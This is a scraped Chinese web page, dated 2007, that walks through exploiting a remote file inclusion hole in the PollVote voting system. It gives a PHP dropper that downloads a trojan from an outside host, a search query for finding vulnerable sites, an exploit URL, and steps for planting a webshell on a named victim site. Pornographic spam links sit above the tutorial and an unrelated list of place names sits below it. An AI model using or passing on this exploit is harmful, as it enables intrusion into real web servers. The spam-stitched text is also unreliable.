最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

PollVote投票系統(tǒng)漏洞利用

 更新時間:2007年01月16日 00:00:00   作者:  
PollVote是一個投票系統(tǒng),今天看了非安全的雜志,看了利用方法, 

不過作者說利用過程的時候很煩瑣,關(guān)鍵的時候又沒說明白, 

簡單的說一下`` 

首先建立2個文本 分別是creatfile.txt和phpdoor.txt 

creatfile.txt內(nèi)容寫 

<? 
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt"); 
$ff=fopen("111.php","a"); 
fwrite ($ff,$f); 
fclose($ff); 
?> 

phpdoor.txt內(nèi)容就寫個PHP木馬 

之后在http://www.google.com 搜索關(guān)鍵詞"pollvote.php?pollname" 

有很多, 
搜索到一個http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg 


就是他了 

EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls 

這個就是利用原理了, 
剛才說到的creatfile.txt和phpdoor.txt這個2個文件都上傳到自己的空間里 

執(zhí)行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt 

這樣 
phpdoor.txt里的內(nèi)容就會生成一個111.php 

這樣我們就得到WEBSHELL了 

http://www.skinnyturd.co.uk/poll/111.php  

相關(guān)文章

最新評論

股票| 故城县| 永宁县| 星座| 石门县| 虎林市| 鄱阳县| 界首市| 潍坊市| 沅陵县| 郑州市| 万州区| 运城市| 肥城市| 永胜县| 滁州市| 武功县| 庄河市| 南通市| 沙洋县| 桑植县| 修武县| 德清县| 保康县| 安徽省| 宜城市| 巴彦县| 肃南| 普格县| 宣汉县| 南川市| 高淳县| 辽源市| 昌图县| 广宁县| 高碑店市| 沧州市| 汤阴县| 同仁县| 芜湖市| 河源市|